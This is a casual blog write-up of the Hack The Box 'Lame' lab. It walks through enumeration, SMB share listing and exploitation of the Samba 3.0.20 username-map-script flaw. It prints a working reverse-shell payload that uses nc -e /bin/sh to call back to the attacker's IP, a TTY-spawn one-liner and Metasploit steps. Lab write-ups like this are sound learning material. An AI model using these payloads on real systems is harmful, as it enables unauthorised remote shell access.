HTB- Lame
This is my first CTF in Hack The Box. If you don’t know what it is in short it’s a platform for cybersecurity interested folks to learn, hone their skills and practice their knowledge. Check it out it’s awesome and many modules and machines are free so you can learn a lot from it.
Lame machine have difficulty level easy so it’s easy to solve i guess. Let’s start and find out.
We start with our pentest 101 methodology (i made it up there is no such thing):
- ENUMERATE
- SEARCH FOR VULNERABILITY
-EXPLOIT IT AND GAIN ACCESS
That’s it do these 3 things and you are hacker HAHA. Ok let’s start with enumeration. For enumeration i choose you Nmap
Nmap scan output:
Here we can see there are 4 ports are open which are pretty much standard ports like ftp,ssh,samba.
We see that ftp allows anonymous login let’s check what it have for us.
sadly nothing. it doesn’t have anything. Next we can see SSH service is running and i honestly don’t think that version is vulnerable. So, i moved to our next port which is Server Message Block known as SMB in windows and samba in UNIX. For those who don’t know what Server Message Block is or what it does, It is a client-server protocol that provides access to resources such as files, printers and serial interfaces, and facilitates communication between network processes.
Now we grabbed it’s version which is 3.0.20 now boys and girls time to put some effort and do some hard work.
Yes, googling is hard. As we can see there is a command execution vulnerability in this version and rapid7 means we can use metasploit too. we will do that too but let’s try manual way cause even if it’s vulnerable sometime exploit doesn’t work. so it is always a good habit to do it manually.
Let’s enumerate samba more and for that we will use smbclient command. we will try to login anonymously means without providing user pass. and quick note we can use enum4linux to enumerate samba further but let’s do it manually.
smbclient -N -L <IP>
Let’s break the command:
smbclient : This command is used to communicate with SMB server.
-N : This flag is used to suppresses the normal password prompt from the client to the use.
-L : This flag lists and allows you to look at what services are available on a server.
We can see number of shares but what interest us the most is tmp share cause it have a comment oh hoes! no it’s noes. Which means we can write on that folder. We can connect to that share using following command:
smbclient //<ip>/tmp
press enter after you execute this command and you will see following interface:
Now let’s understand what this vulnerability is and how to exploit it for that we can see CVE description here https://www.exploit-db.com/exploits/16320 . In short This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands.
You can always google the terms which you don’t know about like shell meta characters. Go on try it. I won’t tell you everything.
Now we can see that that CVE is doing. it’s logging in with
This username let’s copy it. "/=`nohup `"
Now let’s do it.
Here you can see i first used this following command after connecting to smb sever:
logon "/=`nohup nc -e /bin/sh <myip> <port>`"
and split the window, start a netcat listener on same port we specified in the logon command. press enter then press enter to the logon command.
Voila! you got a sudo privilege on the machine now you can spawn a TTY shell using following command.
pythons3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Now let’s do the same thing using metasploit. go on start your metasploit. Search for samba 3.0.20 exploits
use 0
options
set RHOST <MACHINE IP>
set LHOST <YOUR VPN IP>
All set now you are good to go. press run and you will have your shell
There you have it your shell with root access. Now search for flags and that’s it. You have solved your HTB Lame ctf.
In this CTF we learned about different services, how to search for exploits, manual exploitation, Metasploit, Samab service, Samba enumeration, samba exploit, smbclient.
Thank you HTB and creator of this room for this amazing CTF. That’s it for this blog i will write again soon. Make sure you follow me HEHEHE. Till then Bye Bye keep learning, keep hacking ❤.
